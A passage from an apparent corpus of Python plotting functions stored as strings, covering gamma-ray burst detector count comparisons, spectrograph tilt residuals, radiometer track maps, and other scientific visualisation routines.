$\\chi^2$={c:0.1f}\".format(tx=thetax,ty=thetay,c=chi_sq))\n\tax1.errorbar(np.arange(0,(len(data))),data,yerr=err_data,fmt='.',markersize=2,label=\"Data\",elinewidth=0.5)\n\tax1.errorbar(np.arange(0,(len(model))),model,yerr=err_model,fmt='.',markersize=2,label=\"Simulation\",elinewidth=0.5)\n\tax1.legend()\n ax1.xaxis.set_ticks(np.arange(0,len(data)))\n\tax1.set_ylabel('Counts')\n\tax1.xaxis.grid(linewidth=0.5,alpha=0.3)\n ax1.set_xticklabels(Mod_names,rotation=90,fontsize=5)\n\n\tax2.errorbar(np.arange(0,(len(ratio))),ratio,yerr=err_ratio,fmt='.',markersize=2,label=\"Ratio = Data/Model\",elinewidth=0.5)\n\tax2.xaxis.set_ticks(np.arange(0,len(data)))\n ax2.set_xticklabels(Mod_names,rotation=90,fontsize=5)\n ax2.yaxis.set_ticks(np.arange(int(min(ratio-err_ratio)-1),int(max(ratio+err_ratio)+2),1))\n\tax2.tick_params(labelsize=5)\n\tax2.axhline(y=1,linewidth=0.5,color='k')\n\tax2.legend()\n\tax2.set_xlabel('CZT Modules')\n\tax2.set_ylabel('Ratio of counts')\n\tax2.xaxis.grid(linewidth=0.5,alpha=0.3)\n\tplt.tight_layout(h_pad=0.0)\n\tf.set_size_inches([6.5,10])\n\tpdf_file.savefig(f,orientation='portrait') # saves the current figure into a pdf_file page\n\n\t# Plotting comparison graphs with random binning------------------------------\n\t\n sim_flat = sim_dph.flatten()\n\tsim_err_flat = sim_err_dph.flatten()\n grb_flat = grb_dph.flatten()\n bkgd_flat = bkgd_dph.flatten()\n\tsrc_flat = src_dph.flatten()\n\t\n\torder = np.random.permutation(np.arange(0,len(sim_flat)))\n\t\n sim_flat = sim_flat[order]\n\tsim_err_flat = sim_err_flat[order]\n\tgrb_flat = grb_flat[order]\n\tbkgd_flat = bkgd_flat[order]\n\tsrc_flat = src_flat[order]\n\t\n\tprint \"No. of pixels with zero counts in sim_flat: \",sim_flat[sim_flat==0].size\n\tprint \"No. of pixels with zero counts in src_flat: \",src_flat[src_flat==0].size\n\t\n\tbins = np.array(np.sort(np.random.uniform(0,1,comp_bin)*len(sim_flat)),dtype=np.int64)\n\tx = np.zeros(len(bins)+2,dtype=np.int64)\n\tx[0] = 0\n\tx[-1] = len(sim_flat)\n\tx[1:-1] = bins\n\t\n\t#print \"The bin edges: \",x # ---------------------------------------------------------------\n\t\n\tsim_flat_bin = np.array([sim_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)])\n\tsim_err_flat_bin = np.sqrt(np.array([(sim_err_flat[x[i]:x[i+1]]**2).sum() for i in range(comp_bin+1)]))\n\tgrb_flat_bin = np.array([grb_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)])\n\tgrb_err_flat_bin = np.sqrt(np.array([grb_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)]))\n\tbkgd_flat_bin = np.array([bkgd_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)])\n\tbkgd_err_flat_bin = np.sqrt(np.array([bkgd_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)]))\n\tsrc_flat_bin = np.array([src_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)])\n\t\n\tprint \"Total sim_flat_bin : \",sim_flat_bin.sum() #-----------------------------------------\n\t#print \" Max(cumsum) : \",max(np.cumsum(sim_flat)) #-----------------------------------------\n\n # Defining model background and data\n model = sim_flat_bin #avg_flat_bin\n bkgd = bkgd_flat_bin*t_src/t_tot\n src = grb_flat_bin\n\t\n data = src - bkgd\n\n err_src = np.sqrt(src)\n err_bkgd = np.sqrt(bkgd_flat_bin)\n err_model = sim_err_flat_bin\n err_data = np.sqrt(((err_src)**2) + ((err_bkgd)**2)*(t_src/t_total)**2)\n\t\n\tchi_sq_new = (((model-data)**2)/((err_model)**2 + (err_data)**2)).sum()\n # PLotting the comparison plots\n fig = plt.figure()\n plt.title(\"Comparison between simulated and real data for \"+grbdir+ \"\\n\" + r\"$\\theta_x$={tx:0.1f} and $\\theta_y$={ty:0.1f} $\\chi^2$={c:0.1f} \".format(tx=thetax,ty=thetay,c=chi_sq_new))\n plt.errorbar(np.arange(0,(len(data))),data,yerr=err_data,fmt='.',markersize=2,label=\"Data\",elinewidth=0.5)\n plt.errorbar(np.arange(0,(len(model))),model,yerr=err_model,fmt='.',markersize=2,label=\"Simulation\",elinewidth=0.5)\n plt.ylabel('Counts')\n\tplt.xlabel('Random Bins')\n\tplt.xticks(np.arange(0,(len(data)),1))\n\tplt.legend()\n pdf_file.savefig(fig) #saves the current figure into a pdf_file page\n\n\t# Plotting observed vs predicted counts------------------------------------------------------\n\n\tfig = plt.figure()\n\tplt.title(grbdir + r\" : Observed vs Predicted counts with $\\chi^2$={cs:0.1f}\".format(cs=chi_sq))\n\tplt.errorbar(model_copy,data_copy,xerr=err_model_copy,yerr=err_data_copy,fmt='g.',markersize=2,elinewidth=0.5)\n\tfor i in range(len(model_copy)):\n\t\tplt.text(model_copy[i],data_copy[i],Mod_names[i],fontsize=5)\n\tplt.plot(np.arange(-1000,1000),np.arange(-1000,1000),'k',linewidth=0.5)\n\tplt.xlim(min(model_copy)-5,max(model_copy)+5)\n\tplt.ylim(min(data_copy)-5,max(data_copy)+5)\n\tplt.xlabel('Predicted Counts')\n\tplt.ylabel('Observed Counts')\n\tplt.legend()\n\tplt.grid()\n\tpdf_file.savefig(fig)\n\n\t# Scaling the model using curve fit =============================================================== \n\t\n\tparam,pcov = curve_fit(fit_line_int,model_copy,data_copy)\n\tscaling = param[0]\n\tintercept = param[1]\n\t\n\t# Plotting the scaled plots ===================================================================\n\t# Plotting the comparison graphs with equal bins ---------------------------------------\n\n\tsim_dph = sim_dph*badpix_mask\n\tsim_err_dph = sim_err_dph*badpix_mask\n grb_dph = grb_dph*badpix_mask\n bkgd_dph = bkgd_dph*badpix_mask\n\tgrb_err_dph = np.sqrt(grb_dph)*badpix_mask\n\tbkgd_err_dph = np.sqrt(bkgd_dph)*badpix_mask\n\n\tsim_bin = resample(sim_dph,pixbin)\n\tsim_err_bin = np.sqrt(resample(sim_err_dph**2,pixbin))\t\n\tgrb_bin = resample(grb_dph,pixbin)\n\tbkgd_bin = resample(bkgd_dph,pixbin)\n\tgrb_err_bin = np.sqrt(resample(grb_err_dph,pixbin))\t\n\tbkgd_err_bin = np.sqrt(resample(bkgd_err_dph,pixbin))\t\n\n\tsim_flat_bin = sim_bin.flatten()\n\tsim_err_flat_bin = sim_err_bin.flatten()\n\tgrb_flat_bin = grb_bin.flatten()\n\tbkgd_flat_bin = bkgd_bin.flatten()\n\tgrb_err_flat_bin = grb_err_bin.flatten()\n\tbkgd_err_flat_bin = bkgd_err_bin.flatten()\n\t\n\n\t # Defining model background and data\n\t#model = sim_flat_bin*scaling\n\tmodel = sim_flat_bin*scaling + intercept\n\tbkgd = bkgd_flat_bin*t_src/t_tot\n\tsrc = grb_flat_bin\n\t\n\tdata = src - bkgd\n\t\n\terr_src = grb_err_flat_bin\n\terr_bkgd = bkgd_err_flat_bin\n\t#err_model = sim_err_flat_bin*scaling\n\terr_model = sim_err_flat_bin*scaling\n\terr_data = np.sqrt(((err_src)**2) + ((err_bkgd)**2)*(t_src/t_total)**2)\n\t\n\tratio = data/model\n\terr_ratio = ratio*np.sqrt(((err_data/data)**2) + ((err_model/model)**2))\n\t\n\tchi_sq = (((model-data)**2)/((err_model)**2 + (err_data)**2)).sum()\n\t\n\t # PLotting the comparison plots\n\tf,(ax1,ax2) = plt.subplots(2,gridspec_kw={'height_ratios':[2,1]},sharex='row')\n\t\n\tax1.set_title(\"Comparison between simulated (scaled) and real data for \"+grbdir+ \"\\n\" + r\"$\\theta_x$={tx:0.1f} and $\\theta_y$={ty:0.1f} $\\chi^2$={c:0.1f} \".format(tx=thetax,ty=thetay,c=chi_sq))\n\tax1.errorbar(np.arange(0,(len(data))),data,yerr=err_data,fmt='.',markersize=2,label=\"Data\",elinewidth=0.5)\n\tax1.errorbar(np.arange(0,(len(model))),model,yerr=err_model,fmt='.',markersize=2,label=\"Simulation (scaling = {s:0.2f},offset = {o:0.2f})\".format(s=scaling,o=intercept),elinewidth=0.5)\n\tax1.legend()\n ax1.xaxis.set_ticks(np.arange(0,len(data)))\n\tax1.set_ylabel('Counts')\n\tax1.xaxis.grid(linewidth=0.5,alpha=0.3)\n ax1.set_xticklabels(Mod_names,rotation=90,fontsize=5)\n\t\n\tax2.errorbar(np.arange(0,(len(ratio))),ratio,yerr=err_ratio,fmt='.',markersize=2,label=\"Ratio = Data/Model(scaling = {s:0.2f}, offset={o:0.2f})\".format(s=scaling,o=intercept),elinewidth=0.5)\n\tax2.xaxis.set_ticks(np.arange(0,len(data)))\n ax2.set_xticklabels(Mod_names,rotation=90,fontsize=5)\n ax2.yaxis.set_ticks(np.arange(int(min(ratio-err_ratio)-1),int(max(ratio+err_ratio)+2),1))\n\tax2.tick_params(labelsize=5)\n\tax2.axhline(y=1,linewidth=0.5,color='k')\n\tax2.legend()\n\tax2.set_xlabel('CZT Modules')\n\tax2.set_ylabel('Ratio of counts')\n\tax2.xaxis.grid(linewidth=0.5,alpha=0.3)\n\tplt.tight_layout(h_pad=0.0)\n\tf.set_size_inches([6.5,10])\n\tpdf_file.savefig(f,orientation='portrait') # saves the current figure into a pdf_file page\n\n\t# Plotting comparison graphs with random binning------------------------------\n\t\n sim_flat = sim_dph.flatten()\n\tsim_err_flat = sim_err_dph.flatten()\n grb_flat = grb_dph.flatten()\n bkgd_flat = bkgd_dph.flatten()\n\tsrc_flat = src_dph.flatten()\n\t\n\torder = np.random.permutation(np.arange(0,len(sim_flat)))\n\t\n sim_flat = sim_flat[order]\n\tsim_err_flat = sim_err_flat[order]\n\tgrb_flat = grb_flat[order]\n\tbkgd_flat = bkgd_flat[order]\n\tsrc_flat = src_flat[order]\n\t\n\tbins = np.array(np.sort(np.random.uniform(0,1,comp_bin)*len(sim_flat)),dtype=np.int64)\n\tx = np.zeros(len(bins)+2,dtype=np.int64)\n\tx[0] = 0\n\tx[-1] = len(sim_flat)\n\tx[1:-1] = bins\n\t\n\tsim_flat_bin = np.array([sim_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)])\n\tsim_err_flat_bin = np.sqrt(np.array([(sim_err_flat[x[i]:x[i+1]]**2).sum() for i in range(comp_bin+1)]))\n\tgrb_flat_bin = np.array([grb_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)])\n\tgrb_err_flat_bin = np.sqrt(np.array([grb_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)]))\n\tbkgd_flat_bin = np.array([bkgd_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)])\n\tbkgd_err_flat_bin = np.sqrt(np.array([bkgd_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)]))\n\tsrc_flat_bin = np.array([src_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)])\n\t\n # Defining model background and data\n #model = sim_flat_bin*scaling\n\tmodel = sim_flat_bin*scaling + intercept\n bkgd = bkgd_flat_bin*t_src/t_tot\n src = grb_flat_bin\n\t\n data = src - bkgd\n\n err_src = np.sqrt(src)\n err_bkgd = np.sqrt(bkgd_flat_bin)\n #err_model = sim_err_flat_bin*scaling\n\terr_model = sim_err_flat_bin*scaling\n err_data = np.sqrt(((err_src)**2) + ((err_bkgd)**2)*(t_src/t_total)**2)\n\t\n\tchi_sq_new = (((model-data)**2)/((err_model)**2 + (err_data)**2)).sum()\n # PLotting the comparison plots\n fig = plt.figure()\n plt.title(\"Comparison between simulated(scaled) and real data for \"+grbdir+ \"\\n\" + r\"$\\theta_x$={tx:0.1f} and $\\theta_y$={ty:0.1f} $\\chi^2$={c:0.1f} \".format(tx=thetax,ty=thetay,c=chi_sq_new))\n plt.errorbar(np.arange(0,(len(data))),data,yerr=err_data,fmt='.',markersize=2,label=\"Data\",elinewidth=0.5)\n plt.errorbar(np.arange(0,(len(model))),model,yerr=err_model,fmt='.',markersize=2,label=\"Simulation (scaling = {s:0.2f}, offset = {o:0.2f})\".format(s=scaling,o=intercept),elinewidth=0.5)\n plt.ylabel('Counts')\n\tplt.xlabel('Random Bins')\n\tplt.xticks(np.arange(0,(len(data)),1))\n\tplt.legend()\n pdf_file.savefig(fig) #saves the current figure into a pdf_file page\n\n\n\t# Plotting observed vs predicted counts--------------------------------------------------------\n\n\tfig = plt.figure()\n plt.title(grbdir + r\" : Observed vs Predicted counts with $\\chi^2$ = {cs:0.1f}\".format(cs=chi_sq))\n plt.errorbar(model_copy,data_copy,xerr=err_model_copy,yerr=err_data_copy,fmt='g.',markersize=2,elinewidth=0.5)\n\tfor i in range(len(model_copy)):\t\n\t\tplt.text(model_copy[i],data_copy[i],Mod_names[i],fontsize=5)\n #plt.plot(np.arange(-1000,1000),fit_line(np.arange(-1000,1000),scaling),'k',linewidth=0.5,label='m = {s:0.2f}'.format(s=scaling))\n\tplt.plot(np.arange(-1000,1000),fit_line_int(np.arange(-1000,1000),scaling,intercept),'k',linewidth=0.5,label='scaling = {s:0.2f}, offset = {i:0.2f}'.format(s=scaling,i=intercept))\n\tplt.plot(np.arange(min(model_copy)-5,max(model_copy)+5),np.ones(len(np.arange(min(model_copy)-5,max(model_copy)+5)))*intercept,'r-',label='intercept',linewidth=0.5)\n plt.xlim(min(model_copy)-5,max(model_copy)+5)\n plt.ylim(min(data_copy)-5,max(data_copy)+5)\n plt.xlabel('Predicted Counts')\n plt.ylabel('Observed Counts')\n\tplt.legend()\n\tplt.grid()\n pdf_file.savefig(fig)\n\t\t\n\tprint \"===============================================================================================\"\n\t\n\treturn", "def plot_tiltres(setup, mtilt, ytilt, yfit, slit=None, outfile=None, show_QA=False, out_dir=None):\n\n plt.rcdefaults()\n plt.rcParams['font.family']= 'times new roman'\n\n # Outfil\n method = inspect.stack()[0][3]\n if (outfile is None) and (not show_QA):\n outfile = qa.set_qa_filename(setup, method, slit=slit, out_dir=out_dir)\n\n # Setup\n plt.figure(figsize=(8, 4.0))\n plt.clf()\n ax = plt.gca()\n\n # Scatter plot\n res = (mtilt-ytilt) - yfit\n ax.scatter(mtilt, res)\n\n rms = np.std(res)\n ax.text(0.90, 0.90, 'Slit {:d}: RMS (pix) = {:0.5f}'.format(slit, rms),\n transform=ax.transAxes, size='large', ha='right', color='black')\n # Label\n ax.set_xlabel('Row')\n ax.set_ylabel('Residual (pix)')\n\n # Finish\n plt.tight_layout(pad=0.2, h_pad=0.0, w_pad=0.0)\n if show_QA:\n plt.show()\n else:\n plt.savefig(outfile, dpi=400)\n plt.close()\n\n plt.rcdefaults()\n\n return", "def _display_tsne(self):\n self._tsne_window.clear()\n self._tsne_window.plot(self._Y_tsne[:,0], self._Y_tsne[:,1], 'b.')", "def construct_plot(self, amprtb):\n self.fig, [[self.ax1, self.ax2], [self.ax3, self.ax4]] = \\\n plt.subplots(2, 2, figsize=(10, 10),\n subplot_kw={'projection': self.projection})\n ind1, ind2 = amprtb._get_scan_indices(\n self.scanrange, self.timerange, False)\n\n # 10 GHz plot\n stuff = amprtb.plot_ampr_track(\n var='10'+self.chan, latrange=self.latrange,\n lonrange=self.lonrange, parallels=self.parallels,\n meridians=self.meridians, title='', wmts_layer=self.wmts_layer,\n clevs=self.clevs, cmap=self.cmap, show_track=self.show_track,\n maneuver=self.maneuver, scanrange=self.scanrange,\n show_grid=self.show_grid, equator=self.equator,\n show_qc=self.show_qc, resolution=self.resolution,\n projection=self.projection, ax=self.ax1, fig=self.fig,\n verbose=self.verbose, timerange=self.timerange, return_flag=True)\n self.ax1.set_title(self.make_title('10', amprtb, ind1, ind2))\n\n # 19 GHz plot\n amprtb.plot_ampr_track(\n var='19'+self.chan, latrange=self.latrange,\n lonrange=self.lonrange, parallels=self.parallels,\n meridians=self.meridians, title='', wmts_layer=self.wmts_layer,\n clevs=self.clevs, cmap=self.cmap, show_track=self.show_track,\n maneuver=self.maneuver, scanrange=self.scanrange,\n show_grid=self.show_grid, equator=self.equator,\n show_qc=self.show_qc, resolution=self.resolution,\n projection=self.projection, ax=self.ax2, fig=self.fig,\n verbose=self.verbose, timerange=self.timerange)\n self.ax2.set_title(self.make_title('19', amprtb, ind1, ind2))\n\n # 37 GHz plot\n amprtb.plot_ampr_track(\n var='37'+self.chan, latrange=self.latrange,\n lonrange=self.lonrange, parallels=self.parallels,\n meridians=self.meridians, title='', wmts_layer=self.wmts_layer,\n clevs=self.clevs, cmap=self.cmap, show_track=self.show_track,\n maneuver=self.maneuver, scanrange=self.scanrange,\n show_grid=self.show_grid, equator=self.equator,\n show_qc=self.show_qc, resolution=self.resolution,\n projection=self.projection, ax=self.ax3, fig=self.fig,\n verbose=self.verbose, timerange=self.timerange)\n self.ax3.set_title(self.make_title('37', amprtb, ind1, ind2))\n\n # 85 GHz plot\n amprtb.plot_ampr_track(\n var='85'+self.chan, latrange=self.latrange,\n lonrange=self.lonrange, parallels=self.parallels,\n meridians=self.meridians, title='', wmts_layer=self.wmts_layer,\n clevs=self.clevs, cmap=self.cmap, show_track=self.show_track,\n maneuver=self.maneuver, scanrange=self.scanrange,\n show_grid=self.show_grid, equator=self.equator,\n show_qc=self.show_qc, resolution=self.resolution,\n projection=self.projection, ax=self.ax4, fig=self.fig,\n verbose=self.verbose, timerange=self.timerange)\n self.ax4.set_title(self.make_title('85', amprtb, ind1, ind2))\n\n # plt.tight_layout()\n return True", "def tplot(self, analytes=None, figsize=[10, 4], scale=None, filt=None,\n ranges=False, stats=False, stat='nanmean', err='nanstd',\n interactive=False, focus_stage=None, err_envelope=False):\n\n if interactive:\n enable_notebook() # make the plot interactive\n\n if type(analytes) is str:\n analytes = [analytes]\n if analytes is None:\n analytes = self.analytes\n\n if focus_stage is None:\n focus_stage = self.focus_stage\n\n fig = plt.figure(figsize=figsize)\n ax = fig.add_axes([.1,.12,.77,.8])\n\n for a in analytes:\n x = self.Time\n y, yerr = unpack_uncertainties(self.data[focus_stage][a])\n\n if scale is 'log':\n ax.set_yscale('log')\n y[y == 0] = np.nan\n\n if filt:\n ind = self.filt.grab_filt(filt, a)\n xf = x.copy()\n yf = y.copy()\n yerrf = yerr.copy()\n if any(~ind):\n xf[~ind] = np.nan\n yf[~ind] = np.nan\n yerrf[~ind] = np.nan\n if any(~ind):\n ax.plot(x, y, color=self.cmap[a], alpha=.4, lw=0.6)\n ax.plot(xf, yf, color=self.cmap[a], label=a)\n if err_envelope:\n ax.fill_between(xf, yf - yerrf, yf + yerrf, color=self.cmap[a],\n alpha=0.2, zorder=-1)\n else:\n ax.plot(x, y, color=self.cmap[a], label=a)\n if err_envelope:\n ax.fill_between(x, y - yerr, y + yerr, color=self.cmap[a],\n alpha=0.2, zorder=-1)\n\n # Plot averages and error envelopes\n if stats and hasattr(self, 'stats'):\n sts = self.stats[sig][0].size\n if sts > 1:\n for n in np.arange(self.n):\n n_ind = ind & (self.ns == n + 1)\n if sum(n_ind) > 2:\n x = [self.Time[n_ind][0], self.Time[n_ind][-1]]\n y = [self.stats[sig][self.stats['analytes'] == a][0][n]] * 2\n\n yp = ([self.stats[sig][self.stats['analytes'] == a][0][n] +\n self.stats[err][self.stats['analytes'] == a][0][n]] * 2)\n yn = ([self.stats[sig][self.stats['analytes'] == a][0][n] -\n self.stats[err][self.stats['analytes'] == a][0][n]] * 2)\n\n ax.plot(x, y, color=self.cmap[a], lw=2)\n ax.fill_between(x + x[::-1], yp + yn,\n color=self.cmap[a], alpha=0.4,\n linewidth=0)\n else:\n x = [self.Time[0], self.Time[-1]]\n y = [self.stats[sig][self.stats['analytes'] == a][0]] * 2\n yp = ([self.stats[sig][self.stats['analytes'] == a][0] +\n self.stats[err][self.stats['analytes'] == a][0]] * 2)\n yn = ([self.stats[sig][self.stats['analytes'] == a][0] -\n self.stats[err][self.stats['analytes'] == a][0]] * 2)\n\n ax.plot(x, y, color=self.cmap[a], lw=2)\n ax.fill_between(x + x[::-1], yp + yn, color=self.cmap[a],\n alpha=0.4, linewidth=0)\n\n if ranges:\n for lims in self.bkgrng:\n ax.axvspan(*lims, color='k', alpha=0.1, zorder=-1)\n for lims in self.sigrng:\n ax.axvspan(*lims, color='r', alpha=0.1, zorder=-1)\n\n if filt is not None:\n ind = self.filt.grab_filt(filt)\n lims = bool_2_indices(~ind)\n for l, u in lims:\n if u >= len(self.Time):\n u = -1\n ax.axvspan(self.Time[l], self.Time[u], color='k',\n alpha=0.05, lw=0)\n\n # drawn = []\n # for k, v in self.filt.switches.items():\n # for f, s in v.items():\n # if s & (f not in drawn):\n # lims = bool_2_indices(~self.filt.components[f])\n # for u, l in lims:\n # ax.axvspan(self.Time[u-1], self.Time[l], color='k',\n # alpha=0.05, lw=0)\n # drawn.append(f)\n\n ax.text(0.01, 0.99, self.sample + ' : ' + self.focus_stage,\n transform=ax.transAxes,\n ha='left', va='top')\n\n ax.set_xlabel('Time (s)')\n ax.set_xlim(np.nanmin(x), np.nanmax(x))\n \n # y label\n ud = {'rawdata': 'counts',\n 'despiked': 'counts',\n 'bkgsub': 'background corrected counts',\n 'ratios': 'counts/{:s} count',\n 'calibrated': 'mol/mol {:s}'}\n if focus_stage in ['ratios', 'calibrated']:\n ud[focus_stage] = ud[focus_stage].format(self.internal_standard)\n ax.set_ylabel(ud[focus_stage])\n\n if interactive:\n ax.legend()\n plugins.connect(fig, plugins.MousePosition(fontsize=14))\n display.clear_output(wait=True)\n display.display(fig)\n input('Press [Return] when finished.')\n disable_notebook() # stop the interactivity\n else:\n ax.legend(bbox_to_anchor=(1.15, 1))\n\n return fig, ax", "def generate_plot(self):\r\n\t\tx, y = zip(*[p.p for p in self.universe])\r\n\t\tself.ax.cla()\r\n\t\tself.ax.plot(x, y, '.')\r\n\t\tself.ax.set_title('Universe at time: %d' % self.universe.time)\r\n\t\tself.ax.set_xlim([P_MU-4*P_STD, P_MU+4*P_STD])\r\n\t\tself.ax.set_ylim([P_MU-4*P_STD, P_MU+4*P_STD])", "def make_source_location_histogram_plots_uvis(data, file_name, ff, im, coordfile, \\\n filt, path_to_cleans=''):\n\tpylab.ion()\n\tif ff == 0:\n\t\tfig = pylab.figure()\n\t\tfig.subplots_adjust(wspace=0.4)\n\telse:\n\t\tpylab.clf()\n\t\t\n\txc,yc = np.loadtxt(coordfile, unpack=True, usecols = (0,1)) \n\t# plot #1 - object position\n\tsz=50.0\n\tx0=np.round(xc)-sz/2.\n\tx1=np.round(xc)+sz/2.\n\ty0=np.round(yc)-sz/2.\n\ty1=np.round(yc)+sz/2.\n\tax1 = pylab.subplot(1,2,1)\n\tax1.imshow(np.log10(im[y0:y1,x0:x1]),interpolation='nearest')\n\tax1.autoscale(axis='both',enable=False)\n\tax1.scatter([xc-x0-1.0], [yc-y0-1.0], marker='x', s=200., color='w')\n\tpylab.title('X = '+str(xc)+' Y = '+str(yc))\n\n\t# plot #2 - background histogram\n\ttmp_image=glob.glob(path_to_cleans + '*back.fits')[0]\n\tbackim = pyfits.getdata(tmp_image)\n\t#--measure back statistics (mean and mode via IRAF)\n\tinitback = iraf.imstatistics(tmp_image+'[0]', fields='mode,stddev', \\\n\t lower = -100, upper = 10000, nclip=7, \\\n\t lsigma=3.0, usigma=3.0, cache='yes', \\\n\t format='no',Stdout=1)\n\t#print 'initback:'\n\t#print initback\n\tif 'INDEF' not in initback[0]:\n\t\tllim = float(initback[0].split(' ')[0]) - 10.0*\\\n\t\t\t\tfloat(initback[0].split(' ')[1])\n\t\tulim = float(initback[0].split(' ')[0]) + 10.0*\\\n\t float(initback[0].split(' ')[1])\n\t\tbackstats=iraf.imstatistics(tmp_image+'[0]', fields='mean,mode', \\\n\t lower=llim, upper=ulim, nclip=7,lsigma=3.0, \\\n\t usigma=3.0, cache='yes', format='no',Stdout=1)\n\t\tbackmean=float(backstats[0].split(' ')[0])\n\t\tbackmode=float(backstats[0].split(' ')[1])\n\t\tfbackim= np.ndarray.flatten(backim)\n\t\tgd=np.where((fbackim > llim) & (fbackim < ulim))[0]\n\t\tbackmedian=meanclip(fbackim[gd],maxiter=7,return_median=1)[0]\n\n\t\tax2 = pylab.subplot(1,2,2)\n\t\tpylab.hist(fbackim[gd],log=True)\n\t\tpylab.ylim(0.5,600000)\n\t\tpylab.xlim(-20,20)\n\t\tpylab.plot([backmode,backmode],[0.5,600000],ls='-',color='red',\\\n\t label='mode')\n\t\tpylab.plot([backmedian,backmedian],[0.5,600000],ls='--',color='aqua',\\\n \t label='median')\n\t\tpylab.plot([backmean,backmean],[0.5,600000],ls=':',color='black',\\\n \t label='mean')\n\t\tpylab.legend(loc=2, handletextpad=0.0, borderpad=0.0, frameon=False, \\\n \t handlelength=1.)\n\t\tpylab.title('Histogram of Background Pixels')\n\t\tpylab.xlabel('Background [e-]')\n\t\tpylab.ylabel('Number of Objects')\n\t\tpylab.annotate('chip '+str(data[ff]['chip']), [0.77,0.95], \\\n \t xycoords='axes fraction')\n\t\tpylab.annotate(filt,[0.77,0.80],xycoords='axes fraction')\n\n\t\t\n\tpylab.savefig(file_name.split('.fits')[0]+'_srcloc.png')\n\tpylab.ioff()", "def plot_visualization(path_results, x_data, y_data, variant_mode, nb_classes, signal_test, args):\n\n\t#path_tsne = path_results + \"/Visualization/train/\" + str(args.step) + \"_2d.csv\"\n\t#data_frame = pd.read_csv(path_tsne)\n\t\n\tpath_maping = path_results + \"/Maping/\" + str(args.subject).split(\".txt\")[0] + \"/\"\n\tfilename = path_maping + \"maping_\" + str(args.step) + \"_\" + str(args.subject).split(\".txt\")[0] + \"_stick\" + str(args.stick) + \".png\"\n\n\tprint(\"path_save maping\", path_maping)\n\n\tif not os.path.exists(path_maping):\n\t\tos.makedirs(path_maping)\n\n\t#print(\"path_tsne\", path_tsne)\n\n\tlabel_maping = np.array([10])\n\n\tx_data = np.concatenate((x_data,signal_test),axis=0)\n\ty_data = np.concatenate((y_data,label_maping),axis=0)\n\n\tprint(\"x_data concatenate\",x_data.shape)\n\tprint(\"y_data concatenate\",y_data.shape)\n\n\tdata_frame = tsne_2d(x_data, y_data)\n\n\t\n\t\n\tgroups = data_frame.groupby('label')\n\n\tcluster_names, cluster_colors = get_target_names_dr(nb_classes, args.mode, args, variant_mode)\n\n\tfig = plt.figure(figsize=(20, 10))\n\tax = fig.add_subplot(111)\n\tax.margins(0.05) # Optional, just adds 5% padding to the autoscaling\n\tfor name, group in groups:\n\t\t\n\t\tif cluster_names[name] == str(args.subject):\n\t\t\tax.scatter(group.x, group.y, marker='D', s=150, edgecolors = 'face',label=cluster_names[name], color=cluster_colors[name])\n\t\telse:\n\t\t\tax.scatter(group.x, group.y, marker='o', label=cluster_names[name], color=cluster_colors[name])\n\n\tax.legend(numpoints=1) #show legend with only 1 point\n\tplt.savefig(filename) #save the plot", "def plot(self):\n\t\t\n\t\ttf=tfData(self.shotno,tStart=None,tStop=None)\n\t\t\n\t\t_plt.figure()\n\t\tax1 = _plt.subplot2grid((3,2), (0,1), rowspan=3) #tf\n\t\tax2 = _plt.subplot2grid((3,2), (0,0)) #vf\n\t\tax3 = _plt.subplot2grid((3,2), (1,0),sharex=ax2) #oh\n\t\tax4 = _plt.subplot2grid((3,2), (2, 0),sharex=ax2) #sh\n\t\tfig=_plt.gcf()\n\t\tfig.set_size_inches(10,5)\n\t\t\t\t\n\t\ttStart=-2\n\t\ttStop=20\n\t\t\n\t\tax1.plot(tf.time*1e3,tf.tfBankField)\n\t\tax1.axvspan(tStart,tStop,color='r',alpha=0.3)\n\t\t_plot.finalizeSubplot(ax1,xlabel='Time (s)',xlim=[-150,450],ylabel='TF Field (T)')#,title=self.title\n\t\t\n\t\tax2.plot(self.vfTime*1e3,self.vfBankCurrent*1e-3)\n\t\t_plot.finalizeSubplot(ax2,ylabel='VF Current\\n(kA)')\n\t\t\n\t\tax3.plot(self.ohTime*1e3,self.ohBankCurrent*1e-3)\n\t\t_plot.finalizeSubplot(ax3,ylim=[-20,30],ylabel='OH Current\\n(kA)')\n\t\t\n\t\tax4.plot(self.shTime*1e3,self.shBankCurrent*1e-3)\n\t\t_plot.finalizeSubplot(ax4,ylim=[tStart,tStop],xlabel='Time (s)',ylabel='SH Current\\n(kA)')\n\t\t\n\t\t_plot.finalizeFigure(fig,title=self.title)\n#\t\tfig.set_tight_layout(True)\n\t\t\n\t\treturn fig", "def pf_plot(pf, t):\n xx = pf.XS[t, :, 0]\n yy = pf.XS[t, :, 1]\n ww = pf.WS[t, :]\n plt.scatter(xx, yy, s=ww * 5000)", "def plot_traces(self, cellname, targettime, historytime, srctype, syntype):\n self.tstart = targettime - historytime\n self.istart = int(self.tstart / self.plotdt + 0.5)\n self.tend = targettime + historytime\n self.iend = int(self.tend / self.plotdt + 0.5)\n self.tseries = np.linspace(self.tstart, self.tend, \n self.iend - self.istart)\n if cellname not in self.datafile['/Vm']:\n return []\n vm = self.datafile['/Vm/' + cellname] \n plt.plot(self.tseries, \n normalize(vm[self.istart:self.iend]),\n label=cellname)\n stimdata = np.asarray(self.datafile['/stimulus/stim_bg'])\n stim_start = int(self.tstart/self.simdt+0.5)\n stim_end = int(self.tend/self.simdt+0.5)\n stimdata = stimdata[stim_start: stim_end]\n plt.plot(np.linspace(self.tstart, self.tend, len(stimdata)),\n normalize(stimdata),\n 'r--', \n label='STIMULUS')\n precells = self.plot_presynaptic(cellname, srctype, syntype)\n return precells", "def plot(self):\n\t\tself.plotOfSpect()", "def misclass_plot(epoch, model, features, filters, figname, fgal=0.5, idx=-1):\n # fetch Stripe 82 data\n X, Xcov = fetch_prepped_s82data(epoch, fgal, features, filters)\n Xcoadd, Xcoaddcov = fetch_prepped_s82data(epoch, fgal, features,\n filters, use_single=False)\n N = 20000\n X = 